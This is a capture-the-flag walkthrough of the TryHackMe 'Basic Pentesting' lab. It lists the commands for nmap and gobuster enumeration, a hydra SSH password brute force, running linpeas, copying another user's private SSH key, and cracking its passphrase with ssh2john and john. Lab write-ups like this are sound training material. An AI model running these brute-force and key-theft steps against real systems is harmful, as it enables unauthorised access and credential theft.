# Basic Pentesting Try this challenge in [TryHackMe: **Basic Pentesting**](https://tryhackme.com/r/room/basicpentestingjt) > In doing this challenge, I learned the following skills and tools: > > * **brute forcing** - using **hydra** > * **hash cracking** - using **ssh2john**, **john** > * **service enumeration** - using **nmap**, **gobuster** > * **Linux Enumeration** - using **enum4linux**, **linpeas** ## Web App Testing and Privilege Escalation ### Find the services exposed by the machine Run **nmap** and save it in basicpentest directory {% code lineNumbers="true" %} ```bash mkdir basicpentest nmap -sC -sV 10.10.X.X -oN basicpentest/initial ``` {% endcode %} {% hint style="info" %} Just change the **`10.10.X.X`** to the IP address assigned to your target machine {% endhint %}

Check it in the browser: **`http://10.10.X.X`**

Try to **`View Page Source`**. There is a note in green there to **check their dev note section**.

So let's check if there is a **`/dev`** directory.

We get **Not Found** responses from both paths, but we can see information disclosure in the responses that are worth noting. {% hint style="info" %} **Apache/2.4.18 (Ubuntu) Server at 10.10.X.X Port 80** {% endhint %} ### What is the name of the hidden directory on the web server (enter name without /)? Using **gobuster** let's try to figure out what directories are available to the server. {% code overflow="wrap" %} ```bash gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.X.X ``` {% endcode %}

Even without finishing the scan, we get the directory **`/development`**. When we access the directory, we'll see two text files, **`dev.txt`** and **`j.txt`**. Let's open both.

### User brute-forcing to find the username & password We found users `jan` & `kay` via **enum4linux** ```bash /usr/bin/enum4linux -a 10.10.X.X | tee enum4linux.lo ```

Using **hydra**, we now know the password ```bash hydra -l jan -P /usr/share/wordlists/rockyou.txt ssh://10.10.X.X ```

Now that we know jan’s credentials, we used them to log in via SSH Check folders and see if we can find interesting files

Since most actions led to denied permissions, we ran **linpeas** in the machine to check possible privilege escalation methods. To copy `linpeas.sh` to the machine in the `/dev/shm` folder: ```bash scp linpeas.sh jan@10.10.X.X:/tmp ```

Check if the linpeas file is transferred successfully

Make linpeas executable: ```bash chmod +x linpeas.sh ``` Then execute linpeas: ```bash ./linpeas.sh ``` From the linpeas results, we found private SSH keys in the path `/home/kay/.ssh/id_rsa`

Open the id\_rsa file then copy the contents ```bash cat id_rsa ```

In your Kali machine, paste the contents into a file named `kay_id_rsa` ```bash nano kay_id_rsa ```

Change the permissions of the file to read-writable only by you ```bash chmod 600 kay_id_rsa ``` Try logging in to the machine using the user Kay’s id\_rsa ```bash ssh -i kay_id_rsa kay@10.10.X.X ```

We find that a passphrase is needed for this file. To figure out the passphrase for kay’s id\_rsa, we used **ssh2john** in the JohnTheRIpper module ```bash ssh2john ~/kay_id_rsa ```

We need to save this in a text file to be decrypted via **john** ```bash ssh2john ~/kay_id_rsa > ~/kay_id_rsa_john.txt ```

Using john, we decrypted the file and got the passphrase

We can now log in using kay’s credentials ```bash ssh -i kay_id_rsa kay@10.10.X.X ``` {% hint style="success" %} We opened the **pass.bak** file and then the password was revealed {% endhint %}